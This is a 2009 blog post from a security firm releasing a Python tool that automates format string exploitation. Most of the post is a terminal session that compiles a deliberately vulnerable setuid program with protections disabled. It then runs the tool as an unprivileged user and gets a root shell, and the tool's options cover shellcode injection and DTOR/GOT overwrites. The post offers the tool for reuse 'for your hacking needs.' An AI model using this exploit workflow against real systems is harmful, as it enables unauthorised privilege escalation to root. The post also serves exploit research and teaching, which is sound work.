» Exploit

Automatic Format String Exploitation

Posted on November 25, 2009 by The Shell Shakespear Leave a comment

Here at Redspin, we don’t often get a chance to fool around with binaries. Nevertheless, during an audit we encountered a program with a simple format string attack. Not content with the manual format string exploitation process, we decided to write our own tool to automate it. After much coding, we saw that it was good, and decided to share:

root@bt:~# wget http://www.redspin.com/blog/wp-files/Format%20String%20Auto%20Exploitation.tar.bz2
root@bt:~# tar jxvf Format\ String\ Auto\ Exploitation.tar.bz2
root@bt:~# cd Format\ String\ Auto\ Exploitation
root@bt:~/Format String Auto Exploitation# ls
auto_test.sh  format_exploit_automagic.py  Makefile  printf.c  README.txt
root@bt:~# cat printf.c
#include
int main(int argc, char **argv){printf(argv[1]);}
root@bt:~/Format String Auto Exploitation# make
gcc -w -O0 -ggdb -std=c99 -c printf.c
gcc -static -D_FORTIFY_SOURCE=0 -fno-pie -Wno-format -Wno-format-security -fno-stack-protector -z norelro -z execstack  printf.o -o printf
root@bt:~/Format String Auto Exploitation# sudo chmod +s ./printf
root@bt:~/Format String Auto Exploitation# adduser dummy
Adding user `dummy' ...
Adding new group `dummy' (1000) ...
Adding new user `dummy' (1000) with group `dummy' ...
Creating home directory `/home/dummy' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for dummy
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n] y
root@bt:~/Format String Auto Exploitation# su dummy
dummy@bt:/root/Format String Auto Exploitation$ id
uid=1000(dummy) gid=1000(dummy) groups=1000(dummy)
dummy@bt:/root/Format String Auto Exploitation$ ls -al ./printf
-rwsr-sr-x 1 root root 576267 2009-11-25 17:13 ./printf
dummy@bt:/root/Format String Auto Exploitation$ python format_exploit_automagic.py -h
Usage: format_exploit_automagic.py [options] binary
Attempt automatic format string exploitation on the provided binary.

Default action is to insert setreuid(geteuid(),geteuid()); execve('/bin/sh',0,0)
shellcode at the end of the format string, and overwrite the DTOR address of the
binary to return to it.

Options:
 -h, --help                            show this help message and exit
 -v, --verbose                         Increase verbosity (specify multiple times for more) default is 2
 -q, --quiet                           Decrease verbosity (specify multiple times for more)

 Overwrite options:
  Arguments to determine location to overwrite in binary

  -d, --dtor                           overwrite dtor address (True)
  -g function, --got=function          Overwrite GOT function (ie: exit)
  -c, --code                           Overwrite first code segment return address found on stack
  -a 0x12345678, --address=0x12345678  Custom overwrite address

 Exploit options:
  Arguments that control the how and where of our shellcode

  -s, --string                         Insert shellcode within format string (True)
  -S shellcode, --Shellcode=shellcode  Insert Custom shellcode in format string (ie: setuid(0); exec '/bin/sh')
  -E, --Environ                        Put shellcode into environment and use it
  -e name, --environ=name              Use address of given environment variable
  -b 90909090, --bytes=90909090        Find byte string on stack and point to it
  -r 0x12345678, --return=0x12345678   Custom shellcode address
  -o 123, --offset=123                 Custom stack offset to format string
dummy@bt:/root/Format String Auto Exploitation$ python format_exploit_automagic.py ./printf
# whoami
root
# 0wn3d!
(null): 0wn3d!: not found

The tool and accompanying files are here Format String Auto Exploitation.tar.bz2, or you can just get the Python script here: format_exploit_automagic.py.

Even though it is POC, it should be easily modified to support other programs vulnerable to format string attacks, and has been licensed under a GPLv3 license for your hacking needs. I’m considering porting it to Ruby, adding 64bit exploitation and merging it with the Metasploit tree, but figured I’d release it as-is to see if there’s still any interest in old school binary exploitation. I’m also happy to discuss the techniques the tool uses as well, if anyone is interested.

Let me know if you have any issues/hacks/recommendations.
POC: What are you thankful for?

Update: The techniques in the post have been updated here.